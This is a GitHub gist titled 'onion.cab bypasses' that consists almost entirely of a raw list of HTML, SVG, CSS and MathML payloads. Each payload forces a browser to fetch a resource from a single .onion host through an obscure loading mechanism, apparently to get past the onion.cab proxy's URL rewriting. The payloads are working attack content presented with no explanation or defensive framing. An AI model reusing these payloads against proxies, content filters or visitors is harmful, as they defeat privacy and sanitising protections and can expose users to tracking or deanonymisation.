Skip to content

Instantly share code, notes, and snippets.

@intchloe

intchloe/onion.cab bypasses

Created May 20, 2016 08:47
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save intchloe/fda9fe8871f6a718215a9ea39cc54d41 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save intchloe/fda9fe8871f6a718215a9ea39cc54d41 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
onion.cab bypasses
<!DOCTYPE html SYSTEM "https://swehackmzys2gpmb.onion/doctype">
<html xmlns="http://www.w3.org/1999/xhtml" manifest="https://swehackmzys2gpmb.onion/html-manifest">
<?IMPORT namespace="myNS" implementation="https://swehackmzys2gpmb.onion/import-implementation" ?>
<IMPORT namespace="myNS" implementation="https://swehackmzys2gpmb.onion/import-implementation-2" />
<meta http-equiv="Content-Security-Policy" content="script-src 'self'; report-uri http://swehackmzys2gpmb.onion/meta-csp-report-uri">
<meta http-equiv="Content-Security-Policy-Report-Only" content="script-src 'self'; report-uri http://swehackmzys2gpmb.onion/meta-csp-report-uri-2">
<meta name="copyright" content="<img src='https://swehackmzys2gpmb.onion/meta-name-copyright-reading-view'>">
<meta name="displaydate" content="<img src='https://swehackmzys2gpmb.onion/meta-name-displaydate-reading-view'>">
<meta property="og:site_name" content="<img src='https://swehackmzys2gpmb.onion/meta-property-reading-view'>">
<a ping="http://swehackmzys2gpmb.onion/a-ping" href="#">You have to click me</a>
<area ping="http://swehackmzys2gpmb.onion/area-ping" shape="rect" coords="0,0,150,150" href="#">
<img dynsrc="https://swehackmzys2gpmb.onion/img-dynsrc">
<img lowsrc="https://swehackmzys2gpmb.onion/img-lowsrc">
<image href="https://swehackmzys2gpmb.onion/image-href">
<image href="https://swehackmzys2gpmb.onion/svg-image-href">
<image xlink:href="https://swehackmzys2gpmb.onion/svg-image-xlink-href">
<source srcset="https://swehackmzys2gpmb.onion/picture-source-srcset">
<img srcset="https://swehackmzys2gpmb.onion/picture-img-srcset">
<img srcset=",,,,,https://swehackmzys2gpmb.onion/img-srcset">
<form id="test"></form><button form="test" formaction="https://swehackmzys2gpmb.onion/button-formaction">CLICKME</button>
<isindex src="https://swehackmzys2gpmb.onion/isindex-src" type="image">
<isindex action="https://swehackmzys2gpmb.onion/isindex-action"></isindex>
<form id="test2"></form><isindex type="submit" formaction="https://swehackmzys2gpmb.onion/isindex-formaction" form="test2"></isindex>
<video src="https://swehackmzys2gpmb.onion/video-src">
<track kind="subtitles" label="English subtitles" src="https://swehackmzys2gpmb.onion/track-src" srclang="en" default></track>
<source src="https://swehackmzys2gpmb.onion/video-source-src" type="video/mp4">
<source src="https://swehackmzys2gpmb.onion/audio-source-src" type="video/mp4">
<video poster="https://swehackmzys2gpmb.onion/video-poster" src="https://swehackmzys2gpmb.onion/video-poster-2"></video>
<object movie="https://swehackmzys2gpmb.onion/object-movie" type="application/x-shockwave-flash"></object>
<object movie="https://swehackmzys2gpmb.onion/object-movie">
<embed code="https://swehackmzys2gpmb.onion/embed-code"></embed>
<param name="DataURL" value="http://swehackmzys2gpmb.onion/object-param-dataurl">
<svg><script href="https://swehackmzys2gpmb.onion/svg-script-href"></script></svg>
<svg><script xlink:href="https://swehackmzys2gpmb.onion/svg-script-xlink-href"></script></svg>
<iframe srcdoc="<img src=https://swehackmzys2gpmb.onion/iframe-srcdoc-img-src>"></iframe>
<menuitem label="a" icon="https://swehackmzys2gpmb.onion/menuitem-icon"></menuitem>
<s foo="https://swehackmzys2gpmb.onion/css-attr-notation">JKL</s>
background-image: \75 \72 \6C (https://swehackmzys2gpmb.onion/css-escape-url-1);
background-image: \000075\000072\00006C(https://swehackmzys2gpmb.onion/css-escape-url-2);
list-style-image: url&#40;https://swehackmzys2gpmb.onion/inline-css-list-style-image&#41;;
background: url&#x28;https://swehackmzys2gpmb.onion/inline-css-background&#x29;;
background-image: url&lpar;https://swehackmzys2gpmb.onion/inline-css-background-image&rpar;;
<div style="background-image: image('https://swehackmzys2gpmb.onion/inline-css-image-function')"></div>
<div style="filter:progid:DXImageTransform.Microsoft.AlphaImageLoader( src='https://swehackmzys2gpmb.onion/inline-css-filter-alpha', sizingMethod='scale');"></div>
<div style="filter:progid:DXImageTransform.Microsoft.ICMFilter(colorSpace='https://swehackmzys2gpmb.onion/inline-css-filter-icm')"></div>
<rect x="0" y="0" width="200" height="200" fill="url(https://swehackmzys2gpmb.onion/svg-fill)" />
<rect x="0" y="0" width="200" height="200" fill="red" mask="url(https://swehackmzys2gpmb.onion/svg-mask)" />
<set attributeName="xlink:href" begin="0s" to="https://swehackmzys2gpmb.onion/svg-image-set" />
<animate attributeName="xlink:href" begin="0s" from="#" to="https://swehackmzys2gpmb.onion/svg-image-animate" />
<feImage xlink:href="https://swehackmzys2gpmb.onion/svg-feimage" />
<?xml-stylesheet type="text/xsl" href="https://swehackmzys2gpmb.onion/xslt-stylesheet" ?>
<xml src="https://swehackmzys2gpmb.onion/xml-src" id="xml"></xml>
<vmlframe xmlns="urn:schemas-microsoft-com:vml" style="behavior:url(#default#vml);position:absolute;width:100%;height:100%" src="https://swehackmzys2gpmb.onion/vmlframe-src#xss">
<math xlink:href="https://swehackmzys2gpmb.onion/mathml-math">CLICKME</math>
<math><mi xlink:href="https://swehackmzys2gpmb.onion/mathml-mi">CLICKME</mi></math>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment